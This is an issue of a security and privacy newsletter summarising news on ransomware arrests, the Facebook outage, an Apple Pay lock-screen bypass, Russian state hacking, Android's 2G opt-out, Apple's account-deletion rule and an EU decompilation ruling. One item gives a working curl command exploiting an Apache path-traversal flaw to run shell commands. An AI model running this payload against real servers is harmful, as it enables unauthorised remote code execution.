TechLetters #48 - State hacking. Apple's app deletion GDPR policy. Decompiling to fix software is legal in Europe. 2G fades away.
Éditorial
Security
Ransomware arrests. Ukrainian police arrested some suspected members of a ransomware group. Video is here. “Seizure of US$ 375 000 in cash. Seizure of two luxury vehicles worth €217 000”
Huge Facebook availability issue. Why in security? Well, we’ve just seen an example of how things may look when something goes really bad. It could’ve been much worse if it affected Cloudflare or AWS or other providers. Fortunately, the world did not loose any important capability (e.g. payments worked) this time. Facebook’s statement: “configuration changes on the backbone routers that coordinate network traffic between our data centers caused issues that interrupted this communication. This disruption to network traffic had a cascading effect on the way our data centers communicate, bringing our services to a halt”
Forcing contactless payments on iPhone. Works with Apple Pay+Visa. The device do not need to be unlocked. It can also be placed in someone else’s bag. “We found that a non-standard sequence of bytes is broadcast by Transport for London (TfL) ticket-gate readers, and that these “magic bytes” bypass the Apple Pay lock screen”
State hacking. Google warned about 14,000 users that they had been the target of cyber op attempt by the Russian government. In contrast to kinetic areas, in cyber, governments are also fought by private companies. Efficiently. Microsoft says that threat of Russian cyber attacks is increasing. "Russian attacks increasingly successful, from 21% success to 32% this year ... they are attacking government agencies more and more to gather intelligence (up from 3% a year ago to 53%). “growing industry of companies called private sector offensive actors (PSOAs) create and sell malicious cyber technologies that enable their customers to break into people’s computers, phones, and internet-connected devices”.
Remote code execution in Apache web server. Here: curl 'http://X/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; <cmd>'
Android says bye to 2G. Android 12 will let users disable the ability to use 2G. This will increase security of some targeted users. “Used to trade privacy/security against potentially reduced carrier coverage”. “Downgrade attacks allow for adversaries to force an LTE connected UE to 2G or 3G, which has significantly less security controls. Ultimately, adversaries could perform man-in-the-middle (MiTM) active attacks and/or a passive (e.g. eavesdropping) attacks to collect sensitive information”
Privacy
Apple’s app deletion request. Apple to require apps support the functionality of account deletion. To support GDPR Article 17 (right to be forgotten/erasure). Great when tech support of data protection regulations works at a scale.
Technology Policy
Decompiling is legal. Important legal stuff for security:
1. Article 5(1) of Council Directive 91/250/EEC of 14 May 1991 on the legal protection of computer programs must be interpreted as meaning that the lawful purchaser of a computer program is entitled to decompile all or part of that program in order to correct errors affecting its operation, including where the correction consists in disabling a function that is affecting the proper operation of the application of which that program forms a part.
2. Article 5(1) of Directive 91/250 must be interpreted as meaning that the lawful purchaser of a computer program who wishes to decompile that program in order to correct errors affecting the operation thereof is not required to satisfy the requirements laid down in Article 6 of that directive. However, that purchaser is entitled to carry out such a decompilation only to the extent necessary to effect that correction and in compliance, where appropriate, with the conditions laid down in the contract with the holder of the copyright in that program.
Other
In case you feel it's worth it to forward this letter further, I leave this thingy below:
You may also share here: